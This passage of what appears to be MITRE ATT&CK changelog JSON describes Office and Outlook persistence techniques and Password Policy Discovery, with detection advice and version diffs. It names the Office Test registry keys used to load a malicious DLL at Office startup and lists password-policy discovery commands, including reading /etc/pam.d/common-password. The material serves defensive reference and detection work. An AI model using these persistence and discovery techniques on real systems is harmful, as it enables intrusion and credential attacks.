"description": "Hexacorn. (2017, April 17). Beyond good ol\u2019 Run key, Part 62. Retrieved July 3, 2017.",
"url": "http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/"
},
{
"source_name": "GlobalDotName Jun 2019",
"description": "Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.",
"url": "https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique"
},
{
"source_name": "CrowdStrike Outlook Forms",
"description": "Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.",
"url": "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746"
},
{
"source_name": "Outlook Today Home Page",
"description": "Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.",
"url": "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Windows Registry: Windows Registry Key Creation",
"Windows Registry: Windows Registry Key Modification",
"File: File Creation",
"File: File Modification"
],
"x_mitre_detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"Windows",
"Office 365"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-16 21:27:10.873000+00:00\", \"old_value\": \"2020-06-25 17:48:08.916000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1042: Disable or Remove Feature or Program"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)",
"DS0024: Windows Registry (Windows Registry Key Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-11-07 19:44:04.475000+00:00",
"modified": "2021-08-16 21:35:17.618000+00:00",
"name": "Office Test",
"description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n\nThere exist user and global Registry keys for the Office Test feature:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1137/002",
"external_id": "T1137.002"
},
{
"source_name": "Hexacorn Office Test",
"description": "Hexacorn. (2014, April 16). Beyond good ol\u2019 Run key, Part 10. Retrieved July 3, 2017.",
"url": "http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/"
},
{
"source_name": "Palo Alto Office Test Sofacy",
"description": "Falcone, R. (2016, July 20). Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Windows Registry: Windows Registry Key Creation",
"Windows Registry: Windows Registry Key Modification",
"File: File Creation",
"File: File Modification",
"Module: Module Load"
],
"x_mitre_detection": "Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)\n\nConsider monitoring Office processes for anomalous DLL loads.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"Windows",
"Office 365"
],
"x_mitre_system_requirements": [
"Office 2007, 2010, 2013, and 2016"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-16 21:35:17.618000+00:00\", \"old_value\": \"2020-03-20 15:27:51.559000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1054: Software Configuration"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)",
"DS0024: Windows Registry (Windows Registry Key Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-11-07 20:06:02.624000+00:00",
"modified": "2021-08-16 21:29:19.697000+00:00",
"name": "Outlook Forms",
"description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1137/003",
"external_id": "T1137.003"
},
{
"source_name": "SensePost Outlook Forms",
"description": "Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved February 4, 2019.",
"url": "https://sensepost.com/blog/2017/outlook-forms-and-shells/"
},
{
"source_name": "Microsoft Detect Outlook Forms",
"description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.",
"url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack"
},
{
"source_name": "SensePost NotRuler",
"description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.",
"url": "https://github.com/sensepost/notruler"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Application Log: Application Log Content"
],
"x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"Windows",
"Office 365"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-16 21:29:19.697000+00:00\", \"old_value\": \"2020-03-26 17:35:15.823000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1051: Update Software"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0015: Application Log (Application Log Content)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-11-07 20:09:56.536000+00:00",
"modified": "2021-08-16 21:30:01.743000+00:00",
"name": "Outlook Home Page",
"description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1137/004",
"external_id": "T1137.004"
},
{
"source_name": "SensePost Outlook Home Page",
"description": "Stalmans, E. (2017, October 11). Outlook Home Page \u2013 Another Ruler Vector. Retrieved February 4, 2019.",
"url": "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/"
},
{
"source_name": "Microsoft Detect Outlook Forms",
"description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.",
"url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack"
},
{
"source_name": "SensePost NotRuler",
"description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.",
"url": "https://github.com/sensepost/notruler"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Application Log: Application Log Content"
],
"x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"Windows",
"Office 365"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-16 21:30:01.743000+00:00\", \"old_value\": \"2020-03-26 17:35:51.656000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1051: Update Software"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0015: Application Log (Application Log Content)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-11-07 20:00:25.560000+00:00",
"modified": "2021-10-15 20:18:30.700000+00:00",
"name": "Outlook Rules",
"description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n\nOnce malicious rules have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1137/005",
"external_id": "T1137.005"
},
{
"source_name": "SilentBreak Outlook Rules",
"description": "Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved February 4, 2019.",
"url": "https://silentbreaksecurity.com/malicious-outlook-rules/"
},
{
"source_name": "Microsoft Detect Outlook Forms",
"description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.",
"url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack"
},
{
"source_name": "Pfammatter - Hidden Inbox Rules",
"description": "Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.",
"url": "https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/"
},
{
"source_name": "SensePost NotRuler",
"description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.",
"url": "https://github.com/sensepost/notruler"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Microsoft Security"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Application Log: Application Log Content"
],
"x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"Windows",
"Office 365"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Microsoft Security\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 20:18:30.700000+00:00\", \"old_value\": \"2020-03-26 17:36:15.923000+00:00\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"Pfammatter - Hidden Inbox Rules\", \"old_value\": \"SensePost NotRuler\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.\", \"old_value\": \"SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/\", \"old_value\": \"https://github.com/sensepost/notruler\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\\n\\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.\", \"old_value\": \"Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\\n\\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\\n+Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\\n \\n Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][4]\": {\"source_name\": \"SensePost NotRuler\", \"description\": \"SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.\", \"url\": \"https://github.com/sensepost/notruler\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1051: Update Software"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0015: Application Log (Application Log Content)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2018-04-18 17:59:24.739000+00:00",
"modified": "2021-07-26 14:11:39.499000+00:00",
"name": "Password Policy Discovery",
"description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1201",
"external_id": "T1201"
},
{
"source_name": "Superuser Linux Password Policies",
"description": "Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.",
"url": "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu"
},
{
"source_name": "Jamf User Password Policies",
"description": "Holland, J. (2016, January 25). User password policies on non AD machines. Retrieved April 5, 2018.",
"url": "https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines"
},
{
"source_name": "AWS GetPasswordPolicy",
"description": "Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.",
"url": "https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Regina Elwell",
"Isif Ibrahima",
"Sudhanshu Chauhan, @Sudhanshu_C"
],
"x_mitre_data_sources": [
"User Account: User Account Metadata",
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_detection": "Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS",
"IaaS"
],
"x_mitre_version": "1.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-26 14:11:39.499000+00:00\", \"old_value\": \"2020-09-29 14:48:07.227000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\\n\\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).\\n\\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).\", \"old_value\": \"Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\\n\\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n-Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\\n+Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\\n \\n-Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)\\n+Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).\\n+\\n+Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.\", \"old_value\": \"Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"AWS GetPasswordPolicy\", \"description\": \"Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.\", \"url\": \"https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html\"}, \"root['x_mitre_contributors'][0]\": \"Regina Elwell\", \"root['x_mitre_contributors'][1]\": \"Isif Ibrahima\", \"root['x_mitre_data_sources'][0]\": \"User Account: User Account Metadata\", \"root['x_mitre_platforms'][3]\": \"IaaS\"}}",
"previous_version": "1.2",
"version_change": "1.2 \u2192 1.3",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to access detailed information about | t | 1 | Adversaries may attempt to access detailed information about |
| > | the password policy used within an enterprise network. Pass | > | the password policy used within an enterprise network or cl | ||
| > | word policies for networks are a way to enforce complex pass | > | oud environment. Password policies are a way to enforce comp | ||
| > | words that are difficult to guess or crack through [Brute Fo | > | lex passwords that are difficult to guess or crack through [ | ||
| > | rce](https://attack.mitre.org/techniques/T1110). This would | > | Brute Force](https://attack.mitre.org/techniques/T1110). Thi | ||
| > | help the adversary to create a list of common passwords and | > | s information may help the adversary to create a list of com | ||
| > | launch dictionary and/or brute force attacks which adheres t | > | mon passwords and launch dictionary and/or brute force attac | ||
| > | o the policy (e.g. if the minimum password length should be | > | ks which adheres to the policy (e.g. if the minimum password | ||
| > | 8, then not trying passwords such as 'pass123'; not checking | > | length should be 8, then not trying passwords such as 'pass | ||
| > | for more than 3-4 passwords per account if the lockout is s | > | 123'; not checking for more than 3-4 passwords per account i | ||
| > | et to 6 as to not lock out accounts). Password policies can | > | f the lockout is set to 6 as to not lock out accounts). Pas | ||
| > | be set and discovered on Windows, Linux, and macOS systems | > | sword policies can be set and discovered on Windows, Linux, | ||
| > | via various command shell utilities such as <code>net accoun | > | and macOS systems via various command shell utilities such a | ||
| > | ts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy | > | s <code>net accounts (/domain)</code>, <code>Get-ADDefaultDo | ||
| > | </code>, <code>chage -l <username></code>, <code>cat /etc/pa | > | mainPasswordPolicy</code>, <code>chage -l <username></code>, | ||
| > | m.d/common-password</code>, and <code>pwpolicy getaccountpol | > | <code>cat /etc/pam.d/common-password</code>, and <code>pwpo | ||
| > | icies</code>.(Citation: Superuser Linux Password Policies) ( | > | licy getaccountpolicies</code> (Citation: Superuser Linux Pa | ||
| > | Citation: Jamf User Password Policies) | > | ssword Policies) (Citation: Jamf User Password Policies). P | ||
| > | assword policies can be discovered in cloud environments usi | ||||
